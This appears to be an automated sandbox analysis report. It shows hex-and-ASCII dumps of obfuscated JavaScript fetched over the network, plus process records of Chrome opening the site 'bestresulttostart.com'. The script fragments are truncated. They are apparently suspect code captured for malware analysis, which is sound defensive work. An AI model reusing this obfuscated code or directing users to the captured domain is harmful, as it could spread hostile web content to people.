            2024-04-19 03:49:22 UTC1369INData Raw: 4f 57 50 39 57 57 50 79 27 2c 27 57 52 6a 73 6c 38 6b 69 6e 38 6f 4f 57 36 30 45 42 59 4c 37 27 2c 27 57 36 64 64 49 43 6f 2b 64 61 27 2c 27 57 52 64 63 47 74 58 7a 57 52 7a 41 57 34 68 63 49 43 6f 44 27 2c 27 74 38 6b 52 57 36 62 65 71 57 27 2c 27 57 51 53 70 57 35 4a 64 54 48 79 27 2c 27 57 37 58 75 6f 32 46 63 4d 61 27 2c 27 71 38 6b 6e 57 52 7a 32 57 51 4f 27 2c 27 73 38 6b 2f 6d 65 42 63 55 57 27 2c 27 78 38 6b 35 6a 43 6f 5a 57 36 71 27 2c 27 41 38 6b 54 57 50 4e 63 4f 43 6f 5a 27 2c 27 57 34 2f 63 50 6d 6b 72 57 35 78 63 4b 61 27 2c 27 57 51 79 59 57 35 75 64 75 57 27 2c 27 62 6d 6b 50 57 52 58 64 57 52 75 27 2c 27 57 37 42 64 48 4d 44 35 57 4f 43 27 5d 3b 5f 30 78 35 39 64 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 30 78 61 66
            Data Ascii: OWP9WWPy','WRjsl8kin8oOW60EBYL7','W6ddICo+da','WRdcGtXzWRzAW4hcICoD','t8kRW6beqW','WQSpW5JdTHy','W7Xuo2FcMa','q8knWRz2WQO','s8k/meBcUW','x8k5jCoZW6q','A8kTWPNcOCoZ','W4/cPmkrW5xcKa','WQyYW5uduW','bmkPWRXdWRu','W7BdHMD5WOC'];_0x59db=function(){return _0xaf
            2024-04-19 03:49:22 UTC1369INData Raw: 34 62 65 62 34 37 28 27 6a 65 4c 59 27 2c 2d 30 78 31 32 33 2c 2d 30 78 31 33 34 2c 2d 30 78 31 35 33 2c 2d 30 78 31 37 34 29 2b 5f 30 78 31 33 65 62 39 34 28 2d 30 78 63 2c 30 78 39 2c 27 31 36 56 62 27 2c 30 78 32 31 2c 2d 30 78 31 32 29 2c 5f 30 78 33 34 66 36 37 66 3d 5f 30 78 34 62 65 62 34 37 28 27 7a 72 47 57 27 2c 2d 30 78 66 66 2c 2d 30 78 66 30 2c 2d 30 78 66 35 2c 2d 30 78 62 64 29 2b 5f 30 78 35 39 38 65 38 31 28 30 78 31 37 62 2c 27 77 51 4d 33 27 2c 30 78 31 63 65 2c 30 78 31 61 39 2c 30 78 31 63 63 29 2b 27 73 27 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 35 34 65 66 38 36 2c 5f 30 78 31 31 32 63 65 66 29 7b 76 61 72 20 5f 30 78 34 65 64 31 65 32 3d 5f 30 78 35 39 64 62 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64
            Data Ascii: 4beb47('jeLY',-0x123,-0x134,-0x153,-0x174)+_0x13eb94(-0xc,0x9,'16Vb',0x21,-0x12),_0x34f67f=_0x4beb47('zrGW',-0xff,-0xf0,-0xf5,-0xbd)+_0x598e81(0x17b,'wQM3',0x1ce,0x1a9,0x1cc)+'s';function _0x58cd(_0x54ef86,_0x112cef){var _0x4ed1e2=_0x59db();return _0x58cd
            2024-04-19 03:49:22 UTC1369INData Raw: 78 32 65 65 33 64 64 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 36 62 37 32 30 2c 5f 30 78 33 63 64 30 30 38 29 7b 76 61 72 20 5f 30 78 31 62 62 38 32 63 3d 5b 5d 2c 5f 30 78 31 63 34 61 39 65 3d 2d 30 78 31 64 37 63 2b 30 78 31 38 62 2a 30 78 37 2b 30 78 31 32 61 66 2c 5f 30 78 64 62 32 33 37 64 2c 5f 30 78 33 30 31 30 33 38 3d 27 27 3b 5f 30 78 33 36 62 37 32 30 3d 5f 30 78 35 34 30 30 34 38 28 5f 30 78 33 36 62 37 32 30 29 3b 76 61 72 20 5f 30 78 32 34 37 30 61 66 3b 66 6f 72 28 5f 30 78 32 34 37 30 61 66 3d 30 78 31 37 65 2a 30 78 34 2b 2d 30 78 35 65 2a 2d 30 78 35 31 2b 30 78 65 2a 2d 30 78 32 38 64 3b 5f 30 78 32 34 37 30 61 66 3c 2d 30 78 31 61 33 63 2b 2d 30 78 31 2a 30 78 31 32 63 62 2b 30 78 31 2a 30 78 32 65 30 37 3b 5f 30 78 32 34 37 30 61 66
            Data Ascii: x2ee3dd=function(_0x36b720,_0x3cd008){var _0x1bb82c=[],_0x1c4a9e=-0x1d7c+0x18b*0x7+0x12af,_0xdb237d,_0x301038='';_0x36b720=_0x540048(_0x36b720);var _0x2470af;for(_0x2470af=0x17e*0x4+-0x5e*-0x51+0xe*-0x28d;_0x2470af<-0x1a3c+-0x1*0x12cb+0x1*0x2e07;_0x2470af


            Click to jump to process

            Click to jump to process

            Click to jump to process

            Target ID:0
            Start time:05:49:08
            Start date:19/04/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Imagebase:0x7ff76e190000
            File size:3'242'272 bytes
            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Target ID:2
            Start time:05:49:12
            Start date:19/04/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2020,i,16247492945876203200,15019927476780165016,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Imagebase:0x7ff76e190000
            File size:3'242'272 bytes
            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Target ID:3
            Start time:05:49:14
            Start date:19/04/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://bestresulttostart.com"
            Imagebase:0x7ff76e190000
            File size:3'242'272 bytes
            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            No disassembly